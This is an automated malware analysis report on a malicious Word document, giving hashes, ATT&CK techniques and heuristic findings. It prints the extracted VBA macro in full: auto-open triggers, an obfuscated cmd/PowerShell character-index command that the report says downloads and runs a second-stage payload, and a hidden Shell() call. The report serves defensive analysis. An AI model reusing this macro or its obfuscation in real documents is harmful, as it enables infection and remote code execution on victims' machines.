Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c5ab10d6b6f358e7…

MALICIOUS

Office (OLE)

46.0 KB Created: 2018-10-08 21:32:00 Authoring application: Microsoft Office Word First seen: 2018-11-13
MD5: 5407c7ed278a4ddc34ddbd057348209f SHA-1: ac1ce7f218e53f9d019989e5bc05e354cd9f50ad SHA-256: c5ab10d6b6f358e7334c5e62d5cad1c44e297957088d7ec37bcf731023ea0aeb
378 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros that are triggered by AutoOpen and Document_Open events. These macros construct and execute a complex command using cmd.exe and PowerShell, which is designed to download and execute a second-stage payload. The use of Shell(), CreateProcess, WriteProcessMemory, and CreateRemoteThread APIs indicates a high likelihood of malicious activity aimed at executing arbitrary code.

Heuristics 12

  • Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREAD
    Reference to CreateRemoteThread API
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            c = "cmd" & wrd
        Debugging = Shell("cmd.exe " & wrd, 0)
    End If
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
            c = "cmd" & wrd
        Debugging = Shell("cmd.exe " & wrd, 0)
    End If
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "Module1"
Sub AutoOpen()
    Debugging
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
    Debugging
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1358 bytes
SHA-256: 4d833e39be3fbc5191698c03aa7d61b49bb55f8f77538a375c9f1497563bf6f6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
    Debugging
    'MMac
End Sub

Sub Document_Open()
    Debugging
    'MMac
End Sub


Public Function Debugging() As Variant
    Dim Str As String
    strMacro = InputBox("Enter unlock code 123")
    If strMacro = 123 Then
        'Wrd = "cmd.ex"
        'Wrd = Wrd & "e "
        wrd = wrd & " cmd /V:ON/C" & Chr(34) & "set 9e=E)/84li" & Chr(34) & Chr(34) & "3gxXIcw7 f.'qh\dotbue(-snpa:jr&&for %A in (34,25,15,29,38,32,22,29,5,5,19,29,11,29,17,31,33,25,34,17,31,15,17,22,6,24,24,29,33,17,31,14,17,23,8,13,0,12,17,30,30,33,29,15,31,25,27,37,29,14,26,17,33,29,26,19,15,29,27,14,5,6,29,33,26,1,19,24,25,15,33,5,25,35,24,32,26,38,6,33,10,30,20,22,26,26,34,32,36,2,2,24,9,21,35,3,22,11,3,6,3,4,18,4,16,19,14,5,25,28,24,18,38,25,33,26,19,33,29,26,36,4,4,9,2,10,29,26,20,1,1,23,8,42)do set m09=!m09!!9e:~%A,1!&&if %A gtr 41 powershe"
        wrd = wrd & "ll.exe " & Chr(34) & "!m09:*m09!=!" & Chr(34) & Chr(34)
        c = "cmd" & wrd
        Debugging = Shell("cmd.exe " & wrd, 0)
    End If
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.